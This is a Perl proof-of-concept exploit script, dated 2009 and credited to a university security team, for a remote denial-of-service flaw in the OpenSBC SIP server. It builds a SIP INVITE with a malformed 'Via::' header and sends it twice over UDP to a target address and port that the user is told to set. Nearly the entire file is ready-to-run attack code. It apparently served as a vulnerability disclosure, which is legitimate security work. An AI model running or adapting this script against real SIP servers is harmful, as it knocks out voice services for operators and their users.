#!/usr/bin/perl

#######################################################################################
# OpenSBC Remote DoS Vulnerability --- PoC
# IMS Security Team
# nexGIN RC, FAST-NU, Islamabad, Pakistan
# http://www.nexginrc.org
# Jan 30, 2009
#
# Credits:
# -> Vulnerability Discovered by Sohail Aziz and Zubair Rafique
# -> PoC written by M. Ali Akbar
#######################################################################################

#################
# Start of PoC
#
# Note: Change PeerAddr and PeerPort to
# the IP and Port of the OpenSBC server.
#
# Also remove the trailing .txt from the filename (if any).
#
#################

use IO::Socket::INET;

$msg="INVITE sip\:service\@192.168.1.46\:5061 SIP\/2.0\r
Via\:\: SIP\/2.0\/UDP 192.168.1.46\:5066\;branch\=z9hG4bK-6881-1-0\r
From\: sipp <sip\:sipp\@192.168.1.46\:5066>\;tag\=6881SIPpTag001\r
To\: sut <sip\:service\@192.168.1.46\:5061>\r
Call-ID\: 1-6881\@192.168.1.46\r
CSeq\: 1 INVITE\r
Contact\: sip\:sipp\@192.168.1.46\:5066\r
Max-Forwards\: 70\r
Subject\: Performance Test\r
Content-Type\: application\/sdp\r
Content-Length\:   135\r

v\=0\r
o\=user1 53655765 2353687637 IN IP4 192.168.1.46\r
s\=-\r
c\=IN IP4 192.168.1.46\r
t\=0 0\r
m\=audio 6060 RTP\/AVP 0\r
a\=rtpmap\:0 PCMU\/8000\r
";

$socket = new IO::Socket::INET->new(
Proto=>'udp',
PeerPort=>5060,
PeerAddr=>'192.168.1.48',
LocalPort=>5555);

$socket->send($msg);
sleep 1;
$socket->send($msg);

#################
# End of PoC
#################